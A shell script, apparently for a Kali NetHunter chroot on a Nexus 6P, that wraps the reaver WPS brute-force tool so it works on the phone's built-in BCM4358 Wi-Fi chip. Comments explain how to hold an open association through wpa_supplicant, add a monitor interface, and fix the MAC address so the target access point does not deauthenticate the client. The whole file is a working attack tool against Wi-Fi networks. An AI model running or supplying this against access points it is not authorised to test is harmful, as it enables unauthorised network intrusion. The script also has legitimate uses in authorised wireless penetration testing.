#!/system/bin/sh
# reaver-internal.sh — run reaver on the Nexus 6P (angler) ON-BOARD BCM4358.
#
# The problem reaver hits on this chip:
#   reaver associates by injecting frames from a monitor vif and needs the
#   card to ACK the AP's unicast replies in hardware. The BCM4358 (fullmac)
#   does NOT ACK in monitor mode -- ACK is generated by the d11 MAC/PSM in
#   managed mode only (ROM, not ARM/nexmon-patchable, no auto_ack iovar).
#   So reaver's own association times out and the AP deauths us.
#
# The fix that keeps everything on the internal chip:
#   Split the two jobs across two vifs on the SAME radio (the driver's iface
#   combination allows STA + monitor concurrently):
#     - wlan0     : managed STA. wpa_supplicant does an OPEN association to
#                   the AP, so the FIRMWARE maintains the link and ACKs in
#                   hardware (exactly what was missing).
#     - wlan0mon  : monitor vif. reaver runs with -A (--no-associate): it does
#                   NOT try to associate itself; it just drives the WPS /
#                   EAP-WSC exchange over the air while the firmware holds the
#                   association underneath.
#
#   reaver -A is the canonical "external association" mode for cards that
#   can't inject-associate -- which is precisely our case.
#
#   Usage:
#     ./reaver-internal.sh -b AA:BB:CC:DD:EE:FF -c 11      # channel required
#     ./reaver-internal.sh -b <bssid> -c <ch> -- -vvv -L   # pass extra reaver args after --
#     ./reaver-internal.sh -d                              # tear everything down
#
# Requires root, run from the Kali/NetHunter chroot. Internal chip only.

IFACE=wlan0
MONIF=wlan0mon
BSSID=""
CHAN=""
ACTION="run"
CTRL=/var/run/wpa_supplicant_reaver
CONF=/data/local/tmp/reaver_assoc.conf
PIDF=/data/local/tmp/reaver_assoc.pid
EXTRA=""

while [ $# -gt 0 ]; do
    case "$1" in
        -b) BSSID="$2"; shift 2 ;;
        -c) CHAN="$2"; shift 2 ;;
        -i) IFACE="$2"; shift 2 ;;
        -d) ACTION="down"; shift ;;
        --) shift; EXTRA="$*"; break ;;
        -h|--help)
            echo "Usage: $0 -b BSSID -c CHANNEL [-- extra reaver args] | -d"
            exit 0 ;;
        *) echo "[!] Unknown option: $1"; exit 1 ;;
    esac
done

ok()   { echo "[+] $*"; }
info() { echo "[*] $*"; }
warn() { echo "[!] $*"; }
die()  { echo "[x] $*"; exit 1; }
have() { command -v "$1" >/dev/null 2>&1; }

[ "$(id -u)" = "0" ] || die "must run as root"

WSUP="$(command -v wpa_supplicant || echo /system/bin/wpa_supplicant)"
WCLI="$(command -v wpa_cli || echo /system/bin/wpa_cli)"

teardown() {
    info "Tearing down..."
    pkill -f "reaver -i $MONIF" 2>/dev/null
    [ -f "$PIDF" ] && kill "$(cat "$PIDF")" 2>/dev/null
    rm -f "$PIDF"
    pkill -f "$CTRL" 2>/dev/null
    iw dev "$MONIF" del 2>/dev/null
    ok "Down."
}

if [ "$ACTION" = "down" ]; then
    teardown
    exit 0
fi

[ -n "$BSSID" ] || die "need -b BSSID"
[ -n "$CHAN" ]  || die "need -c CHANNEL (reaver -A needs a fixed channel)"
have reaver || die "reaver not found in the chroot"
have iw     || die "iw not found"
have "$WSUP" || die "wpa_supplicant not found"

echo "=== reaver on the on-board BCM4358 (external association) ==="
info "Target : $BSSID  channel $CHAN"
info "Link   : $IFACE (managed, firmware associates + ACKs)"
info "WPS    : $MONIF (monitor, reaver -A drives EAP-WSC)"

# 1. Clean slate.
teardown >/dev/null 2>&1

# 2. Bring the STA iface up and read its REAL MAC. Both vifs and reaver must
#    use this one MAC: it is the address the firmware put in its hardware
#    Address Match Table, so it is the only MAC the chip ACKs for. (The first
#    attempt failed with deauth reason 6 -- "class-2 frame from nonauthenticated
#    STA" -- because wpa_supplicant had randomized its MAC, so the AP saw one
#    MAC authenticate and a different MAC send association/WPS frames.)
ip link set "$IFACE" up 2>/dev/null
sleep 1
HWMAC="$(cat "/sys/class/net/$IFACE/address" 2>/dev/null)"
[ -n "$HWMAC" ] || HWMAC="$(ip link show "$IFACE" 2>/dev/null | awk '/link\/ether/{print $2}')"
[ -n "$HWMAC" ] && ok "Using on-board MAC $HWMAC for both the link and reaver (AMT/ACK match)." \
                 || warn "could not read $IFACE MAC; MAC mismatch may cause reason-6 deauth."

# 3. wpa_supplicant: OPEN association to the AP so the firmware holds the link
#    and ACKs in hardware. (WPS APs accept an open association for the WSC
#    exchange.) Private control socket so we don't fight Android's supplicant.
#    mac_addr=0 / preassoc_mac_addr=0 force the REAL hardware MAC (no
#    randomization) so the AP sees a single, ACKed, authenticated STA.
mkdir -p "$(dirname "$CONF")" "$CTRL" 2>/dev/null
cat > "$CONF" <<EOF
ctrl_interface=$CTRL
update_config=1
ap_scan=1
mac_addr=0
preassoc_mac_addr=0
network={
	bssid=$BSSID
	key_mgmt=NONE
	scan_ssid=1
	mac_addr=0
	disabled=0
}
EOF

pkill -f "$CTRL" 2>/dev/null
info "Starting wpa_supplicant (managed open assoc on $IFACE)..."
"$WSUP" -B -i "$IFACE" -D nl80211 -c "$CONF" -P "$PIDF" >/dev/null 2>&1
sleep 2
"$WCLI" -p "$CTRL" -i "$IFACE" ping 2>/dev/null | grep -q PONG \
    || { warn "nl80211 ctrl not up, trying wext..."; pkill -f "$CTRL" 2>/dev/null;
         "$WSUP" -B -i "$IFACE" -D wext -c "$CONF" -P "$PIDF" >/dev/null 2>&1; sleep 2; }

# nudge it to associate to the target
"$WCLI" -p "$CTRL" -i "$IFACE" reassociate >/dev/null 2>&1
info "Waiting for the firmware to associate (ACK path)..."
n=0; assoc=0
while [ $n -lt 15 ]; do
    if "$WCLI" -p "$CTRL" -i "$IFACE" status 2>/dev/null | grep -qiE 'wpa_state=(ASSOCIATED|COMPLETED|4WAY_HANDSHAKE)'; then
        assoc=1; break
    fi
    sleep 1; n=$((n+1))
done
if [ "$assoc" = 1 ]; then
    ok "Firmware associated to $BSSID (hardware ACK active)."
else
    warn "association not confirmed; reaver -A may still work if the AP is permissive."
fi

# 4. Add a monitor vif on the SAME radio for reaver's WPS frames.
info "Adding monitor vif $MONIF on the same radio..."
iw dev "$IFACE" interface add "$MONIF" type monitor 2>/dev/null
ip link set "$MONIF" up 2>/dev/null
iw dev "$MONIF" set channel "$CHAN" 2>/dev/null
ip link show "$MONIF" >/dev/null 2>&1 || die "could not create $MONIF"
ok "$MONIF up on channel $CHAN."

# 5. Run reaver in external-association mode against the held link, forcing
#    reaver to source from the SAME real MAC (-m) the firmware ACKs. Without
#    this reaver uses its own/spoofed MAC and the AP deauths with reason 6.
MACARG=""
[ -n "$HWMAC" ] && MACARG="-m $HWMAC"
echo
info "Launching reaver -A on $MONIF (association held by firmware, MAC $HWMAC)..."
echo "    reaver -i $MONIF -b $BSSID -c $CHAN -A $MACARG ${EXTRA:--vv}"
echo
reaver -i "$MONIF" -b "$BSSID" -c "$CHAN" -A $MACARG ${EXTRA:--vv}
rc=$?

echo
info "reaver exited (rc=$rc). Tear down with:  $0 -d"
exit $rc
